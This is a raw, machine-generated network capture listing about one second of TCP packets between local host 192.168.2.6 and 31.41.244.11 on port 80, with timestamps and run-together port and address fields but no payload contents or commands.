                                                                                                                                                                  Dec 18, 2024 11:09:11.866300106 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.866373062 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.866413116 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.870923042 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.870969057 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.871012926 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.871052980 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.875525951 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.875570059 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.875613928 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.875652075 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.880201101 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.880227089 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.880245924 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.880264997 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.884870052 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.884912014 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.884962082 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.885003090 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.889534950 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.889581919 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.889844894 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.889888048 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.893126965 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.893174887 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.893249035 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.893287897 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.896773100 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.896817923 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.896888971 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.896929026 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.900369883 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.900417089 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.900480986 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.900521040 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.904030085 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.904073954 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.904134035 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.904176950 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.907706976 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.907761097 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.907864094 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.907905102 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.911331892 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.911375046 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.911448002 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.911489010 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.915092945 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.915136099 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.915175915 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.915215969 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.918577909 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.918623924 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.022377968 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.022444010 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.022461891 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.022492886 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.023803949 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.023849964 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.023905993 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.023947954 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.026709080 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.026751041 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.026787996 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.026828051 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.029592037 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.029632092 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.029689074 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.029731989 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.032500982 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.032547951 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.032578945 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.032617092 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.035290003 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.035331964 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.035373926 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.035413027 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.037981987 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.038023949 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.038034916 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.038060904 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.040669918 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.040700912 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.040718079 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.040734053 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.043252945 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.043510914 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.043530941 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.043550968 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.045814037 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.045866013 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.045909882 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.045943022 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.048506021 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.048543930 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.048648119 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.048682928 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.051080942 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.051153898 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.051156044 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.051192999 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.053683043 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.053746939 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.053827047 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.053903103 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.056273937 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.056365013 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.056415081 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.058888912 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.058939934 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.059024096 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.059062004 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.061438084 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.061630011 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.061678886 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.064007044 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.064210892 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.064264059 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.066586971 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.066637039 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.066680908 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.066720009 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.069192886 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.069292068 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.069365025 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.071814060 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.071916103 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.071974039 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.074378967 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.074435949 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.074508905 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.074554920 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.076958895 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.077058077 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.077096939 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.079535007 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.079632998 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.079685926 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.082122087 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.082165956 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.082293034 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.082333088 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.084717035 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.084758043 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.084774971 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.084811926 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.087343931 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.087373018 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.087389946 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.087405920 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.089926958 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.089993000 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.090013981 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.090050936 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.092503071 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.092545986 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.092595100 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.092629910 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.095057011 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.095107079 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.095171928 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.095212936 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.097677946 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.097723007 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.097780943 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.097819090 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.100284100 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.100328922 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.100337982 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.100373030 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.102883101 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.102926016 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.103004932 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.103053093 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.105464935 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.105509043 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.105576992 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.105618000 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.108074903 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.108114958 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.108160019 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.108196974 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.110768080 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.110810041 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.110955000 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.110997915 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.113240957 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.113281012 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.113296032 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.113357067 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.115822077 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.115869999 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.116008043 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.116048098 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.118359089 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.118397951 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.214209080 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.214313030 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.214350939 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.214396000 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.215280056 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.215342045 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.215348005 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.215389013 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.217463970 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.217508078 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.217575073 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.217617035 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.219723940 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.219770908 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.219772100 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.219805002 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.221803904 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.221851110 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.221920013 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.221961021 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.223881006 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.223922968 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.224004030 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.224050999 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.225990057 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.226036072 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.226047039 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.226089954 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.228044033 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.228095055 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.228138924 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.228180885 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.230119944 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.230160952 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.230320930 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.230357885 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.232068062 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.232110977 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.232187986 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.232228041 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.234015942 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.234061956 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.234276056 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.234433889 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.235975981 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.236028910 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.236052036 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.236092091 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.237991095 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.238034010 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.238212109 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.238251925 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.239794970 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.239836931 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.239959002 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.240001917 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.241684914 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.241734982 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.241884947 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.241925955 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.243561029 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.243603945 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.243643999 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.243683100 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.245405912 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.245445967 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.245488882 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.245529890 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.247291088 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.247334957 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.247378111 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.247417927 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.249242067 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.249285936 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.249356031 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.249394894 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.251046896 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.251092911 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.251236916 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.251276970 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.252895117 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.252942085 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.252969980 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.253010988 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.254810095 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.254854918 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.254856110 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.254889011 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.256635904 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.256666899 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.256684065 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.256700993 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.258567095 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.258610010 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.258654118 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.258687973 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.260339022 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.260382891 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.260423899 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.260461092 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.262187958 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.262231112 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.262279034 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.262316942 CET4987780192.168.2.631.41.244.11
